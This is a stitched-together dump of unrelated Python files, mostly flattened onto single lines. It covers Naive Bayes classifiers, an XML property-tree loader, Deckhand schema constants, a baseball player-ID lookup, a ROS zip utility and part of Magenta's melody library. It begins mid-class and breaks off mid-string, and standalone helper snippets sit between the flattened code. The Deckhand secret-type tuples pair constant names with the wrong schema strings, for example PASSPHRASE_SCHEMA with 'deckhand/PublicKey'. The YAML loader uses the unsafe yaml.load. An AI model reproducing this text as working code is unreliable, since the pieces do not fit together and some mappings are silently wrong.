def top(self, n): """Return (count, obs) tuples for the n most frequent observations.""" return heapq.nlargest(n, [(v, k) for (k, v) in self.dictionary.items()]) def sample(self): """Return a random sample from the distribution.""" if self.sampler is None: self.sampler = weighted_sampler(list(self.dictionary.keys()), list(self.dictionary.values())) return self.sampler() def NaiveBayesLearner(dataset, continuous=True, simple=False): if simple: return NaiveBayesSimple(dataset) if continuous: return NaiveBayesContinuous(dataset) else: return NaiveBayesDiscrete(dataset) def NaiveBayesSimple(distribution): """ A simple naive bayes classifier that takes as input a dictionary of CountingProbDist objects and classifies items according to these distributions. The input dictionary is in the following form: (ClassName, ClassProb): CountingProbDist """ target_dist = {c_name: prob for c_name, prob in distribution.keys()} attr_dists = {c_name: count_prob for (c_name, _), count_prob in distribution.items()} def predict(example): """Predict the target value for example. Calculate probabilities for each class and pick the max.""" def class_probability(target_val): attr_dist = attr_dists[target_val] return target_dist[target_val] * product(attr_dist[a] for a in example) return max(target_dist.keys(), key=class_probability) return predict def NaiveBayesDiscrete(dataset): """ Just count how many times each value of each input attribute occurs, conditional on the target value. Count the different target values too. """ target_vals = dataset.values[dataset.target] target_dist = CountingProbDist(target_vals) attr_dists = {(gv, attr): CountingProbDist(dataset.values[attr]) for gv in target_vals for attr in dataset.inputs} for example in dataset.examples: target_val = example[dataset.target] target_dist.add(target_val) for attr in dataset.inputs: attr_dists[target_val, attr].add(example[attr]) def predict(example): """ Predict the target value for example. Consider each possible value, and pick the most likely by looking at each attribute independently. """ def class_probability(target_val): return (target_dist[target_val] * product(attr_dists[target_val, attr][example[attr]] for attr in dataset.inputs)) return max(target_vals, key=class_probability) return predict def NaiveBayesContinuous(dataset): """ Count how many times each target value occurs. Also, find the means and deviations of input attribute values for each target value. """ means, deviations = dataset.find_means_and_deviations() target_vals = dataset.values[dataset.target] target_dist = CountingProbDist(target_vals) def predict(example): """Predict the target value for example. 
Consider each possible value, and pick the most likely by looking at each attribute independently.""" def class_probability(target_val): prob = target_dist[target_val] for attr in dataset.inputs: prob *= gaussian(means[target_val][attr], deviations[target_val][attr], example[attr]) return prob return max(target_vals, key=class_probability) return predict FGDATA/aura-props # TODO: properly handle enumerated nodes import os.path import sys #import xml.etree.ElementTree as ET import lxml.etree as ET from props import PropertyNode, root # internal xml tree parsing routine def _parseXML(pynode, xmlnode, basepath): overlay = 'overlay' in xmlnode.attrib exists = xmlnode.tag in pynode.__dict__ if len(xmlnode) or 'include' in xmlnode.attrib: # has children newnode = PropertyNode() if 'include' in xmlnode.attrib: filename = basepath + '/' + xmlnode.attrib['include'] print "calling load():", filename, xmlnode.attrib load(filename, newnode) if 'n' in xmlnode.attrib: # enumerated node n = int(xmlnode.attrib['n']) if not exists: pynode.__dict__[xmlnode.tag] = [] elif not type(pynode.__dict__[xmlnode.tag]) is list: savenode = pynode.__dict__[xmlnode.tag] pynode.__dict__[xmlnode.tag] = [ savenode ] tmp = pynode.__dict__[xmlnode.tag] pynode.extendEnumeratedNode(tmp, n) pynode.__dict__[xmlnode.tag][n] = newnode elif exists: if not overlay: # append # print "node exists:", xmlnode.tag, "overlay:", overlay if not type(pynode.__dict__[xmlnode.tag]) is list: # we need to convert this to an enumerated list print "converting node to enumerated:", xmlnode.tag savenode = pynode.__dict__[xmlnode.tag] pynode.__dict__[xmlnode.tag] = [ savenode ] pynode.__dict__[xmlnode.tag].append(newnode) else: # overlay (follow existing tree) newnode = pynode.__dict__[xmlnode.tag] else: # create new node pynode.__dict__[xmlnode.tag] = newnode for child in xmlnode: _parseXML(newnode, child, basepath) else: # leaf value = xmlnode.text if 'type' in xmlnode.attrib: if xmlnode.attrib['type'] == 'bool': print xmlnode.tag, "is bool" if value == '0' or value == 'false' or value == '': value = False else: value = True if 'n' in xmlnode.attrib: # enumerated node n = int(xmlnode.attrib['n']) if not exists: pynode.__dict__[xmlnode.tag] = [] elif not type(pynode.__dict__[xmlnode.tag]) is list: savenode = pynode.__dict__[xmlnode.tag] pynode.__dict__[xmlnode.tag] = [ savenode ] tmp = pynode.__dict__[xmlnode.tag] pynode.extendEnumeratedLeaf(tmp, n, "") pynode.__dict__[xmlnode.tag][n] = value # print "leaf:", xmlnode.tag, value, xmlnode.attrib elif exists: if not overlay: # append if not type(pynode.__dict__[xmlnode.tag]) is list: # convert to enumerated. 
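# The branches above and below implement a small "promote to enumerated list" pattern: when a tag
# that already holds a single value appears again (or carries an n= index), the existing scalar is
# wrapped in a list and further values are appended or indexed. A standalone sketch of that
# pattern on a plain dict (promote_and_append is a hypothetical helper, not part of the props API):
def promote_and_append(d, key, value):
    """Store value under key, converting an existing scalar entry into a list."""
    if key not in d:
        d[key] = value                 # first occurrence: plain scalar
    elif isinstance(d[key], list):
        d[key].append(value)           # already enumerated: append
    else:
        d[key] = [d[key], value]       # promote scalar to list, keep the old value first

# Example:
#   cfg = {}
#   for v in ('a', 'b', 'c'):
#       promote_and_append(cfg, 'item', v)   # -> {'item': ['a', 'b', 'c']}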
print "converting node to enumerated" savenode = pynode.__dict__[xmlnode.tag] pynode.__dict__[xmlnode.tag] = [ savenode ] pynode.__dict__[xmlnode.tag].append(value) else: # overwrite pynode.__dict__[xmlnode.tag] = value elif type(xmlnode.tag) is str: pynode.__dict__[xmlnode.tag] = value else: # print "Skipping unknown node:", xmlnode.tag, ":", value pass # load xml file and create a property tree rooted at the given node # supports def load(filename, pynode): try: xml = ET.parse(filename) except: print filename + ": xml parse error:\n" + str(sys.exc_info()[1]) return False path = os.path.dirname(filename) print "path:", path xmlroot = xml.getroot() for child in xmlroot: _parseXML(pynode, child, path) return True def _buildXML(xmlnode, pynode): for child in pynode.__dict__: node = pynode.__dict__[child] if isinstance(node, PropertyNode): xmlchild = ET.Element(child) xmlnode.append(xmlchild) _buildXML(xmlchild, node) elif type(node) is list: for i, ele in enumerate(node): if isinstance(ele, PropertyNode): xmlchild = ET.Element(child) # print "attrib n =", i xmlchild.attrib['n'] = str(i) xmlnode.append(xmlchild) _buildXML(xmlchild, ele) else: xmlchild = ET.Element(child) xmlchild.attrib['n'] = str(i) xmlchild.text = str(ele) xmlnode.append(xmlchild) elif type(child) is str or type(child) is unicode: xmlchild = ET.Element(child) xmlchild.text = str(node) xmlnode.append(xmlchild) else: print "xml build skipping:", child, ":", str(node) # save the property tree starting at pynode into an xml file. def save(filename, pynode=root): xmlroot = ET.Element('PropertyList') xml = ET.ElementTree(xmlroot) _buildXML(xmlroot, pynode) try: xml.write(filename, encoding="us-ascii", xml_declaration=False, pretty_print=True) except: print filename + ": xml write error:\n" + str(sys.exc_info()[1]) return deckhand/types.py # Copyright 2017 AT&T Intellectual Property. All other rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. DOCUMENT_SECRET_TYPES = ( CERTIFICATE_AUTHORITY_SCHEMA, CERTIFICATE_KEY_AUTHORITY_SCHEMA, CERTIFICATE_KEY_SCHEMA, CERTIFICATE_SCHEMA, PRIVATE_KEY_SCHEMA, PUBLIC_KEY_SCHEMA, PASSPHRASE_SCHEMA ) = ( 'deckhand/CertificateAuthority', 'deckhand/CertificateAuthorityKey', 'deckhand/Certificate', 'deckhand/CertificateKey', 'deckhand/Passphrase', 'deckhand/PrivateKey', 'deckhand/PublicKey', ) DOCUMENT_SCHEMA_TYPES = ( DATA_SCHEMA_SCHEMA, LAYERING_POLICY_SCHEMA, VALIDATION_POLICY_SCHEMA, ) = ( 'deckhand/DataSchema', 'deckhand/LayeringPolicy', 'deckhand/ValidationPolicy', ) DOCUMENT_SCHEMA_TYPES += DOCUMENT_SECRET_TYPES DECKHAND_VALIDATION_TYPES = ( DECKHAND_SCHEMA_VALIDATION, ) = ( 'deckhand-schema-validation', ) ENCRYPTION_TYPES = ( CLEARTEXT, ENCRYPTED ) = ( 'cleartext', 'encrypted', ) METADATA_SCHEMA_TYPES = ( CONTROL, DOCUMENT ) = ( 'metadata/Control', 'metadata/Document' ) import pandas as pd import requests import io # dropped key_uuid. looks like a has we wouldn't need for anything. # TODO: allow for typos. String similarity? def get_lookup_table(): print('Gathering player lookup table. 
This may take a moment.') url = "https://raw.githubusercontent.com/chadwickbureau/register/master/data/people.csv" s=requests.get(url).content table = pd.read_csv(io.StringIO(s.decode('utf-8')), dtype={'key_sr_nfl': object, 'key_sr_nba': object, 'key_sr_nhl': object}) #subset columns cols_to_keep = ['name_last','name_first','key_mlbam', 'key_retro', 'key_bbref', 'key_fangraphs', 'mlb_played_first','mlb_played_last'] table = table[cols_to_keep] #make these lowercase to avoid capitalization mistakes when searching table['name_last'] = table['name_last'].str.lower() table['name_first'] = table['name_first'].str.lower() # Pandas cannot handle NaNs in integer columns. We need IDs to be ints for successful queries in statcast, etc. # Workaround: replace ID NaNs with -1, then convert columns to integers. User will have to understand that -1 is not a valid ID. table[['key_mlbam', 'key_fangraphs']] = table[['key_mlbam', 'key_fangraphs']].fillna(-1) table[['key_mlbam', 'key_fangraphs']] = table[['key_mlbam', 'key_fangraphs']].astype(int) # originally returned as floats which is wrong return table def playerid_lookup(last=None, first=None, player_list=None): # force input strings to lowercase if last: last = last.lower() if first: first = first.lower() table = get_lookup_table() # if player_list has a value, then the user is passing in a list of players # the list of players may be comma delimited for last, first, or just last if player_list: player_counter = 1 for player in player_list: last = player.split(",")[0].strip() first = None if(len(player.split(",")) > 1): first = player.split(",")[1].strip() if(player_counter == 1): results = playerid_lookup(last, first) else: results = results.append(playerid_lookup(last, first), ignore_index = True) player_counter += 1 return results if first is None: results = table.loc[table['name_last']==last] else: results = table.loc[(table['name_last']==last) & (table['name_first']==first)] #results[['key_mlbam', 'key_fangraphs', 'mlb_played_first', 'mlb_played_last']] = results[['key_mlbam', 'key_fangraphs', 'mlb_played_first', 'mlb_played_last']].astype(int) # originally returned as floats which is wrong results = results.reset_index().drop('index', 1) return results # data = playerid_lookup('bonilla') # data = playerid_lookup('bonilla', 'bobby') def playerid_reverse_lookup(player_ids, key_type=None): """Retrieve a table of player information given a list of player ids :param player_ids: list of player ids :type player_ids: list :param key_type: name of the key type being looked up (one of "mlbam", "retro", "bbref", or "fangraphs") :type key_type: str :rtype: :class:`pandas.core.frame.DataFrame` """ key_types = ('mlbam', 'retro', 'bbref', 'fangraphs', ) if not key_type: key_type = key_types[0] # default is "mlbam" if key_type not provided elif key_type not in key_types: raise ValueError( '[Key Type: {}] Invalid; Key Type must be one of "{}"'.format(key_type, '", "'.join(key_types)) ) table = get_lookup_table() key = 'key_{}'.format(key_type) results = table[table[key].isin(player_ids)] results = results.reset_index().drop('index', 1) return results #!/usr/bin/env python from zipfile import ZipFile import argparse import datetime import rospkg import yaml import glob import os def main(): # Parse arguments parser = argparse.ArgumentParser(description='Zip a collection of files from a config file list') parser.add_argument('-zip', type=str, default="", help='name of the zip output file') parser.add_argument('-list', type=str, default="", help='name of the yaml 
input config file list') args, unknown = parser.parse_known_args() # utils.check_unknown_args(unknown) if args.zip: zip_url = args.zip if zip_url[-4:] != '.zip': zip_url += '.zip' else: now = datetime.datetime.now() zip_url = zip_url = os.getenv("HOME") + '/zipped_' + now.strftime("%Y%m%d_%H%M%S") + '.zip' if args.list: list_url = args.list else: # Get an instance of RosPack with the default search paths rospack = rospkg.RosPack() list_url = rospack.get_path("handy_tools") + "/config/zip_from_list.yaml" with open(list_url, 'r') as list_file: yaml_data = yaml.load(list_file) print "Elements of list_to_zip in [{0}] will be zipped to [{1}]".format(list_url, zip_url) success_count = 0 fail_count = 0 with ZipFile(zip_url,'w') as zip: for element in yaml_data["list_to_zip"]: element = os.path.expanduser(element) element = os.path.expandvars(element) expanded_element = glob.glob(element) if not expanded_element: print "Unable to find file or files [{0}]".format(element) fail_count += 1 for finally_a_file in expanded_element: print "Zipping file [{0}]".format(finally_a_file) zip.write(finally_a_file) success_count += 1 print "{0} files successfully zipped, {1} failures".format(success_count, fail_count) if __name__ == "__main__": main() amedeosoria/Magenta # Copyright 2016 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Utility functions for working with melodies. Use Melody.extract_melodies to extract monophonic melodies from a NoteSequence proto. Use Melody.to_sequence to write a melody to a NoteSequence proto. Then use midi_io.sequence_proto_to_midi_file to write that NoteSequence to a midi file. Use MelodyEncoderDecoder.encode to convert a Melody object to a tf.train.SequenceExample of inputs and labels. These SequenceExamples are fed into the model during training and evaluation. During melody generation, use MelodyEncoderDecoder.get_inputs_batch to convert a list of melodies into an inputs batch which can be fed into the model to predict what the next note should be for each melody. Then use MelodyEncoderDecoder.extend_melodies to extend each of those melodies with an event sampled from the softmax output by the model. """ import abc import math # internal imports import numpy as np import tensorflow as tf from magenta.lib import sequence_example_lib from magenta.protobuf import music_pb2 # Special events. NUM_SPECIAL_EVENTS = 2 NOTE_OFF = -1 NO_EVENT = -2 # Other constants. MIN_MIDI_PITCH = 0 # Inclusive. MAX_MIDI_PITCH = 127 # Inclusive. NOTES_PER_OCTAVE = 12 DEFAULT_BEATS_PER_MINUTE = 120.0 BEATS_PER_BAR = 4 # This code assumes 4 beats per measure of music. # Standard pulses per quarter. # https://en.wikipedia.org/wiki/Pulses_per_quarter_note STANDARD_PPQ = 96 # Set the quantization cutoff. # Note events before this cutoff are rounded down to nearest step. Notes # above this cutoff are rounded up to nearest step. The cutoff is given as a # fraction of a step. 
# For example, with quantize_cutoff = 0.75 using 0-based indexing, # if .75 < event <= 1.75, it will be quantized to step 1. # If 1.75 < event <= 2.75 it will be quantized to step 2. # A number close to 1.0 gives less wiggle room for notes that start early, # and they will be snapped to the previous step. QUANTIZE_CUTOFF = 0.75 # NOTE_KEYS[note] = The major keys that note belongs to. # ex. NOTE_KEYS[0] lists all the major keys that contain the note C, # which are: # [0, 1, 3, 5, 7, 8, 10] # [C, C#, D#, F, G, G#, A#] # # 0 = C # 1 = C# # 2 = D # 3 = D# # 4 = E # 5 = F # 6 = F# # 7 = G # 8 = G# # 9 = A # 10 = A# # 11 = B # # NOTE_KEYS can be generated using the code below, but is explicitly declared # for readability: # scale = [1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 1] # NOTE_KEYS = [[j for j in xrange(12) if scale[(i - j) % 12]] # for i in xrange(12)] NOTE_KEYS = [ [0, 1, 3, 5, 7, 8, 10], [1, 2, 4, 6, 8, 9, 11], [0, 2, 3, 5, 7, 9, 10], [1, 3, 4, 6, 8, 10, 11], [0, 2, 4, 5, 7, 9, 11], [0, 1, 3, 5, 6, 8, 10], [1, 2, 4, 6, 7, 9, 11], [0, 2, 3, 5, 7, 8, 10], [1, 3, 4, 6, 8, 9, 11], [0, 2, 4, 5, 7, 9, 10], [1, 3, 5, 6, 8, 10, 11], [0, 2, 4, 6, 7, 9, 11]] class PolyphonicMelodyException(Exception): pass class BadNoteException(Exception): pass class Melody(object): """Stores a quantized stream of monophonic melody events. Melody is an intermediate representation that all melody models can use. NoteSequence proto to melody code will do work to align notes and extract monophonic melodies. Model specific code just needs to convert Melody to SequenceExample protos for TensorFlow. Melody implements an iterable object. Simply iterate to retrieve the melody events. Melody events are integers in range [-2, 127] (inclusive), where negative values are the special event events: NOTE_OFF, and NO_EVENT. Non-negative values [0, 127] are note-on events for that midi pitch. A note starts at a non-negative value (that is the pitch), and is held through subsequent NO_EVENT events until either another non-negative value is reached (even if the pitch is the same as the previous note), or a NOTE_OFF event is reached. A NOTE_OFF starts at least one step of silence, which continues through NO_EVENT events until the next non-negative value. NO_EVENT values are treated as default filler. Notes must be inserted in ascending order by start time. Note end times will be truncated if the next note overlaps. Melodies can start at any non-negative time, and are shifted left so that the bar containing the first note-on event is the first bar. Attributes: events: A python list of melody events which are integers. Melody events are described above. offset: When quantizing notes, this is the offset between indices in `events` and time steps of incoming melody events. An offset is chosen such that the first melody event is close to the beginning of `events`. steps_per_bar: Number of steps in a bar (measure) of music. last_on: Index of last note-on event added. This index will be within the range of `events`. last_off: Index of the NOTE_OFF event that belongs to the note-on event at `last_on`. This index is likely not in the range of `events` unless _write_all_notes was called. """ def __init__(self, steps_per_bar=16): """Construct an empty Melody. Args: steps_per_bar: How many time steps per bar of music. Melody needs to know about bars to skip empty bars before the first note. """ self.events = [] self.offset = 0 self.steps_per_bar = steps_per_bar self.last_on = None # Index of the last note-on event in `events`. 
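# A runnable version of the generator quoted in the NOTE_KEYS comment above (ported from xrange
# to range); it rebuilds the table so it can be checked against the declared constant.
def _regenerate_note_keys():
    scale = [1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 1]   # semitones present in a major scale
    return [[j for j in range(12) if scale[(i - j) % 12]] for i in range(12)]

# e.g.  assert _regenerate_note_keys() == NOTE_KEYS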
# last_off is the index of the NOTE_OFF event belonging to the most # recently added note. self.last_off = None def __iter__(self): """Return an iterator over the events in this Melody. Returns: Python iterator over events. """ return iter(self.events) def __len__(self): """How many events are in this Melody. Returns: Number of events as an int. """ return len(self.events) def _can_add_note(self, start_step): """Check if a note-on event can be added at the given time step. Note-on events cannot be added at the same time as or before previous note-on events. Args: start_step: Time step of the note-on that we wish to add. This is a non-negative integer. Returns: True if `start_step` is after all previous note-on events. """ return self.last_on is None or start_step - self.offset > self.last_on def _add_note(self, pitch, start_step, end_step): """Adds the given note to the stream. The previous note's end step will be changed to end before this note if there is overlap. The note is not added if `start_step` is before the start step of the previously added note, or if `start_step` equals `end_step`. Args: pitch: Midi pitch. An integer between 0 and 127 inclusive. start_step: A non-negative integer step that the note begins on. end_step: An integer step that the note ends on. The note is considered to end at the onset of the end step. `end_step` must be greater than `start_step`. """ if not self._can_add_note(start_step): raise BadNoteException( 'Given start step %d is before last on event at %d' % (start_step, self.last_on)) if start_step == end_step: raise BadNoteException('Given start step and end step are the same: %d' % start_step) if not self.events: self.offset = start_step - start_step % self.steps_per_bar start_step_offset = start_step - self.offset end_step_offset = end_step - self.offset self.events += [NO_EVENT] * (start_step_offset - len(self.events) + 1) self.events[start_step_offset] = pitch if self.last_off is not None and self.last_off < start_step_offset: self.events[self.last_off] = NOTE_OFF self.last_on = start_step_offset self.last_off = end_step_offset def _write_all_notes(self): """Write remaining note off event to `events`. This internal method makes sure that all notes being temporarily stored in other instance variables, namely self.last_on and self.last_off, are written to self.events. __iter__ and __len__ will only return what is in self.events, so all notes must be written there after operating on the events in this instance. """ self.events += [NO_EVENT] * (self.last_off - len(self.events) + 1) self.events[self.last_off] = NOTE_OFF self.last_on = None self.last_off = None def _clear(self): """Clear `events` and last note-on/off information.""" self.events = [] self.last_on = None self.last_off = None def _distance_to_last_event(self, step): """Returns distance of the given step to the last off event. Args: step: Step to compute the distance to. Returns: Distance between step and last off event. 0 if events are the same. Negative if step comes before the last off event. Raises: ValueError: When the stream is empty. """ if self.last_off is None: raise ValueError('No events in the stream') return step - self.offset - self.last_off def get_note_histogram(self): """Gets a histogram of the note occurrences in a melody. Returns: A list of 12 ints, one for each note value (C at index 0 through B at index 11). Each int is the total number of times that note occurred in the melody. 
""" np_melody = np.array(self.events, dtype=int) return np.bincount( np_melody[np_melody >= MIN_MIDI_PITCH] % NOTES_PER_OCTAVE, minlength=NOTES_PER_OCTAVE) def get_major_key_histogram(self): """Gets a histogram of the how many notes fit into each key. Returns: A list of 12 ints, one for each Major key (C Major at index 0 through B Major at index 11). Each int is the total number of notes that could fit into that key. """ note_histogram = self.get_note_histogram() key_histogram = np.zeros(NOTES_PER_OCTAVE) for note, count in enumerate(note_histogram): key_histogram[NOTE_KEYS[note]] += count return key_histogram def get_major_key(self): """Finds the major key that this melody most likely belongs to. If multiple keys match equally, the key with the lowest index is returned, where the indexes of the keys are C Major = 0 through B Major = 11. Returns: An int for the most likely key (C Major = 0 through B Major = 11) """ key_histogram = self.get_major_key_histogram() return key_histogram.argmax() def from_notes(self, notes, bpm=120.0, gap=16, ignore_polyphonic_notes=False): """Populate self with an iterable of music_pb2.NoteSequence.Note. BEATS_PER_BAR/4 time signature is assumed. The given list of notes is quantized according to the given beats per minute and populated into self. Any existing notes in the instance are cleared. 0 velocity notes are ignored. The melody is ended when there is a gap of `gap` steps or more after a note. If note-on events occur at the same step, this melody is cleared and an exception is thrown. Args: notes: Iterable of music_pb2.NoteSequence.Note bpm: Beats per minute. This determines the quantization step size in seconds. Beats are subdivided according to `steps_per_bar` given to the constructor. gap: If this many steps or more follow a note, the melody is ended. ignore_polyphonic_notes: If False, and multiple notes occur within the same melody step, a PolyphonicMelodyException will be raised. If true, only one of the notes occurring in the same step will be used. The note used will be the note with the earlier NoteSequence `start_time`. If both notes have the same `start_time`, the note with the higher pitch is used, since melodies usually follow the top voicing when played alongside chords. Raises: PolyphonicMelodyException: If any of the notes start on the same step when quantized and ignore_polyphonic_notes is False. """ self._clear() # Compute quantization steps per second. steps_per_second = bpm / 60.0 * self.steps_per_bar / BEATS_PER_BAR quantize = lambda x: int(math.ceil(x - QUANTIZE_CUTOFF)) # Sort track by note start times, and secondarily by pitch descending. notes.sort(key=lambda note: (note.start_time, -note.pitch)) for note in notes: # Ignore 0 velocity notes. if not note.velocity: continue # Quantize the start and end times of the note. start_step = quantize(note.start_time * steps_per_second) end_step = quantize(note.end_time * steps_per_second) if end_step <= start_step: end_step = start_step + 1 # Do not allow notes to start in negative time. if start_step < 0: raise BadNoteException( 'Got negative note time: start_time = %s, end_time = %s' % (note.start_time, note.end_time)) # If start_step comes before or lands on an already added note's start # step, we cannot add it. Discard the melody because it is not monophonic. if not self._can_add_note(start_step): if ignore_polyphonic_notes: continue else: self._clear() raise PolyphonicMelodyException() # If a gap of `gap` or more steps is found, end the melody. 
if (len(self) and self._distance_to_last_event(start_step) >= gap): break # Add the note-on and off events to the melody. self._add_note(note.pitch, start_step, end_step) self._write_all_notes() def from_event_list(self, events): """Populate self with a list of event values.""" self.events = list(events) def to_sequence(self, velocity=100, instrument=0, sequence_start_time=0.0, bpm=120.0): """Converts the Melody to Sequence proto. Args: velocity: Midi velocity to give each note. Between 1 and 127 (inclusive). instrument: Midi instrument to give each note. sequence_start_time: A time in seconds (float) that the first note in the sequence will land on. bpm: Beats per minute (float). Returns: A NoteSequence proto encoding the given melody. """ seconds_per_step = 60.0 / bpm * BEATS_PER_BAR / self.steps_per_bar sequence = music_pb2.NoteSequence() sequence.tempos.add().bpm = bpm sequence.ticks_per_beat = STANDARD_PPQ current_sequence_note = None for step, note in enumerate(self): if MIN_MIDI_PITCH <= note <= MAX_MIDI_PITCH: # End any sustained notes. if current_sequence_note is not None: current_sequence_note.end_time = ( step * seconds_per_step + sequence_start_time) # Add a note. current_sequence_note = sequence.notes.add() current_sequence_note.start_time = ( step * seconds_per_step + sequence_start_time) # Give the note an end time now just to be sure it gets closed. current_sequence_note.end_time = ( (step + 1) * seconds_per_step + sequence_start_time) current_sequence_note.pitch = note current_sequence_note.velocity = velocity current_sequence_note.instrument = instrument elif note == NOTE_OFF: # End any sustained notes. if current_sequence_note is not None: current_sequence_note.end_time = ( step * seconds_per_step + sequence_start_time) current_sequence_note = None return sequence def transpose(self, transpose_amount, min_note=0, max_note=128): """Transpose notes in this Melody. All notes are transposed the specified amount. Additionally, all notes are octave shifted to lie within the [min_note, max_note) range. Args: transpose_amount: The number of half steps to transpose this Melody. Positive values transpose up. Negative values transpose down. min_note: Minimum pitch (inclusive) that the resulting notes will take on. max_note: Maximum pitch (exclusive) that the resulting notes will take on. """ for i in xrange(len(self.events)): # Transpose MIDI pitches. Special events below MIN_MIDI_PITCH are not # changed. if self.events[i] >= MIN_MIDI_PITCH: self.events[i] += transpose_amount if self.events[i] < min_note: self.events[i] = ( min_note + (self.events[i] - min_note) % NOTES_PER_OCTAVE) elif self.events[i] >= max_note: self.events[i] = (max_note - NOTES_PER_OCTAVE + (self.events[i] - max_note) % NOTES_PER_OCTAVE) def squash(self, min_note, max_note, transpose_to_key): """Transpose and octave shift the notes in this Melody. The key center of this melody is computed with a heuristic, and the notes are transposed to be in the given key. The melody is also octave shifted to be centered in the given range. Additionally, all notes are octave shifted to lie within a given range. Args: min_note: Minimum pitch (inclusive) that the resulting notes will take on. max_note: Maximum pitch (exclusive) that the resulting notes will take on. transpose_to_key: The melody is transposed to be in this key. 0 = C Major. Returns: How much notes are transposed by. 
""" melody_key = self.get_major_key() key_diff = transpose_to_key - melody_key midi_notes = [note for note in self.events if MIN_MIDI_PITCH <= note <= MAX_MIDI_PITCH] if not midi_notes: return 0 melody_min_note = min(midi_notes) melody_max_note = max(midi_notes) melody_center = (melody_min_note + melody_max_note) / 2 target_center = (min_note + max_note - 1) / 2 center_diff = target_center - (melody_center + key_diff) transpose_amount = ( key_diff + NOTES_PER_OCTAVE * int(round(center_diff / float(NOTES_PER_OCTAVE)))) self.transpose(transpose_amount, min_note, max_note) return transpose_amount def extract_melodies(sequence, steps_per_beat=4, min_bars=7, min_unique_pitches=5): """Extracts a list of melodies from the given NoteSequence proto. A time signature of BEATS_PER_BAR is assumed for each sequence. If the sequence has an incompatible time signature, like 3/4, 5/4, etc, then the time signature is ignored and BEATS_PER_BAR/4 time is assumed. Once a note-on event in a track is encountered, a melody begins. Once a gap of silence since the last note-off event of a bar length or more is encountered, or the end of the track is reached, that melody is ended. Only the first melody of each track is used (this reduces the number of repeated melodies that may come from repeated choruses or verses, but may also cause unique non-first melodies, such as bridges and outros, to be missed, so maybe this should be changed). The melody is then checked for validity. The melody is only used if it is at least `min_bars` bars long, and has at least `min_unique_pitches` unique notes (preventing melodies that only repeat a few notes, such as those found in some accompaniment tracks, from being used). After scanning each instrument track in the NoteSequence, a list of all the valid melodies is returned. Args: sequence: A NoteSequence proto containing notes. steps_per_beat: How many subdivisions of each beat. BEATS_PER_BAR/4 time is assumed, so steps per bar is equal to `BEATS_PER_BAR` * `steps_per_beat`. min_bars: Minimum length of melodies in number of bars. Shorter melodies are discarded. min_unique_pitches: Minimum number of unique notes with octave equivalence. Melodies with too few unique notes are discarded. Returns: A python list of Melody instances. """ # Assume bars contain 4 beats, or quarter notes. steps_per_bar = steps_per_beat * 4 # Beats per minute is stored in the tempo change event. If there is no tempo # then assume 120 bpm per the MIDI standard. bpm = (sequence.tempos[0].bpm if len(sequence.tempos) else DEFAULT_BEATS_PER_MINUTE) # Group note messages into tracks. tracks = {} for note in sequence.notes: if note.instrument not in tracks: tracks[note.instrument] = [] tracks[note.instrument].append(note) melodies = [] for track in tracks.values(): melody = Melody(steps_per_bar) # Quantize the track into a Melody object. # If any notes start at the same time, only one is kept. melody.from_notes(track, bpm=bpm, gap=steps_per_bar, ignore_polyphonic_notes=True) # Require a certain melody length. if len(melody) - 1 < steps_per_bar * min_bars: tf.logging.debug('melody too short') continue # Require a certain number of unique pitches. note_histogram = melody.get_note_histogram() unique_pitches = np.count_nonzero(note_histogram) if unique_pitches < min_unique_pitches: tf.logging.debug('melody too simple') continue melodies.append(melody) return melodies class MelodyEncoderDecoder(object): """An abstract class for translating between melodies and model data. 
When building your dataset, the `encode` method takes in a melody and returns a SequenceExample of inputs and labels. These SequenceExamples are fed into the model during training and evaluation. During melody generation, the `get_inputs_batch` method takes in a list of the current melodies and returns an inputs batch which is fed into the model to predict what the next note should be for each melody. The `extend_melodies` method takes in the list of melodies and the softmax returned by the model and extends each melody by one step by sampling from the softmax probabilities. This loop (`get_inputs_batch` -> inputs batch is fed through the model to get a softmax -> `extend_melodies`) is repeated until the generated melodies have reached the desired length. The `melody_to_input`, `melody_to_label`, and `class_index_to_melody_event` methods must be overwritten to be specific to your model. See basic_rnn/basic_rnn_encoder_decoder.py for an example of this. """ __metaclass__ = abc.ABCMeta def __init__(self, min_note=48, max_note=84, transpose_to_key=0): """Initializes a MelodyEncoderDecoder object. You can change `min_note` and `max_note` to increase/decrease the melody range. Since melodies are transposed into this range to be run through the model and then transposed back into their original range after the melodies have been extended, the location of the range is somewhat arbitrary, but the size of the range determines the possible size of the generated melodies range. `transpose_to_key` should be set to the key that if melodies were transposed into that key, they would best sit between `min_note` and `max_note` with having as few notes outside that range. The same `min_note`, `max_note`, and `transpose_to_key` values should be used when creating your dataset, training your model, and generating melodies from it. If you change `min_note`, `max_note`, or `transpose_to_key`, you will have to recreate your dataset and retrain your model before you can accurately generate melodies from it. Args: min_note: The minimum midi pitch the encoded melodies can have. max_note: The maximum midi pitch the encoded melodies can have. transpose_to_key: The key that encoded melodies will be transposed into. Attributes: min_note: The minimum midi pitch the encoded melodies can have. max_note: The maximum midi pitch the encoded melodies can have. transpose_to_key: The key that encoded melodies will be transposed into. Properties: input_size: The length of the list returned by self.melody_to_input. num_classes: The range of ints that can be returned by self.melody_to_label. Raises: ValueError: If `min_note` or `max_note` are outside the midi range, or if the [`min_note`, `max_note`) range is less than an octave. A range of at least an octave is required to be able to octave shift notes into that range while preserving their scale value. """ if min_note < MIN_MIDI_PITCH: raise ValueError('min_note must be >= 0. min_note is %d.' % min_note) if max_note > MAX_MIDI_PITCH + 1: raise ValueError('max_note must be <= 128. max_note is %d.' % max_note) if max_note - min_note < NOTES_PER_OCTAVE: raise ValueError('max_note - min_note must be >= 12. min_note is %d. ' 'max_note is %d. max_note - min_note is %d.' % (min_note, max_note, max_note - min_note)) if transpose_to_key < 0 or transpose_to_key > NOTES_PER_OCTAVE - 1: raise ValueError('transpose_to_key must be >= 0 